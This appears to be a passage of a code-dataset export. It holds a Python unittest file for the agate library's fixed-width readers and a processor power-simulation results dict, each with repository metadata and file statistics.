| 31.089431
| 0.671233
| 0.08682
| 0
| 0.745455
| 0
| 0
| 0.042452
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.059091
| false
| 0
| 0.054545
| 0
| 0.172727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5ce42b56528ba7523255614982035678a030ad24
| 1,772
|
py
|
Python
|
tests/test_fixed.py
|
andriyor/agate
|
9b12d4bcc75bf3788e0774e23188f4409c3e7519
|
[
"MIT"
] | 663
|
2016-02-16T13:43:00.000Z
|
2022-03-13T17:21:19.000Z
|
tests/test_fixed.py
|
andriyor/agate
|
9b12d4bcc75bf3788e0774e23188f4409c3e7519
|
[
"MIT"
] | 347
|
2015-08-28T13:46:37.000Z
|
2016-02-16T01:53:06.000Z
|
tests/test_fixed.py
|
andriyor/agate
|
9b12d4bcc75bf3788e0774e23188f4409c3e7519
|
[
"MIT"
] | 122
|
2016-02-23T02:43:24.000Z
|
2022-03-04T17:21:14.000Z
|
#!/usr/bin/env python
try:
import unittest2 as unittest
except ImportError:
import unittest
from agate import csv, fixed
class TestFixed(unittest.TestCase):
def test_reader(self):
with open('examples/testfixed_converted.csv') as f:
csv_reader = csv.Reader(f)
csv_header = next(csv_reader)
csv_data = list(csv_reader)
with open('examples/testfixed') as f:
with open('examples/testfixed_schema.csv') as schema_f:
fixed_reader = fixed.Reader(f, schema_f)
fixed_data = list(fixed_reader)
self.assertEqual(csv_header, fixed_reader.fieldnames)
self.assertEqual(csv_data, fixed_data)
def test_reader_func(self):
with open('examples/testfixed_converted.csv') as f:
csv_reader = csv.reader(f)
csv_header = next(csv_reader)
csv_data = list(csv_reader)
with open('examples/testfixed') as f:
with open('examples/testfixed_schema.csv') as schema_f:
fixed_reader = fixed.reader(f, schema_f)
fixed_data = list(fixed_reader)
self.assertEqual(csv_header, fixed_reader.fieldnames)
self.assertEqual(csv_data, fixed_data)
def test_dict_reader(self):
with open('examples/testfixed_converted.csv') as f:
csv_reader = csv.DictReader(f)
csv_data = list(csv_reader)
with open('examples/testfixed') as f:
with open('examples/testfixed_schema.csv') as schema_f:
fixed_reader = fixed.DictReader(f, schema_f)
fixed_data = list(fixed_reader)
self.assertEqual(csv_reader.fieldnames, fixed_reader.fieldnames)
self.assertEqual(csv_data, fixed_data)
| 34.076923
| 72
| 0.642777
| 221
| 1,772
| 4.923077
| 0.167421
| 0.090993
| 0.132353
| 0.206801
| 0.829963
| 0.829963
| 0.829963
| 0.829963
| 0.829963
| 0.782169
| 0
| 0.00077
| 0.26693
| 1,772
| 51
| 73
| 34.745098
| 0.836798
| 0.011287
| 0
| 0.578947
| 0
| 0
| 0.135351
| 0.104512
| 0
| 0
| 0
| 0
| 0.157895
| 1
| 0.078947
| false
| 0
| 0.105263
| 0
| 0.210526
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7aa8cc92b1f1750f6ec2545abff7dd84f35f1060
| 68,566
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos_splash/cmpD_choleskybarnesfftwater.sp/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos_splash/cmpD_choleskybarnesfftwater.sp/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos_splash/cmpD_choleskybarnesfftwater.sp/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.204603,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.363393,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.11055,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.635775,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.10093,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.631416,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.36812,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.458173,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 7.7797,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.209808,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0230473,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.243032,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.170449,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.45284,
'Execution Unit/Register Files/Runtime Dynamic': 0.193497,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.643318,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.59116,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 4.92155,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00238064,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00238064,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00206893,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000798397,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00244852,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00927873,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.02299,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.163857,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.47197,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.556533,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.22463,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0733521,
'L2/Runtime Dynamic': 0.0149759,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.49788,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.53945,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.170198,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.170198,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.30486,
'Load Store Unit/Runtime Dynamic': 3.549,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.419679,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.839358,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.148946,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.15004,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0773917,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.815992,
'Memory Management Unit/Runtime Dynamic': 0.227432,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 29.5043,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.731972,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.041318,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.317832,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.09112,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 11.0287,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0588041,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.248876,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.376591,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.287381,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.463534,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.233977,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.984892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.270943,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.9829,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0711461,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.012054,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.106781,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.089147,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.177927,
'Execution Unit/Register Files/Runtime Dynamic': 0.101201,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.239662,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.59396,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.33431,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00183336,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00183336,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00161558,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00063566,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.0012806,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0065629,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.016909,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0856993,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.45121,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.280368,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.291073,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
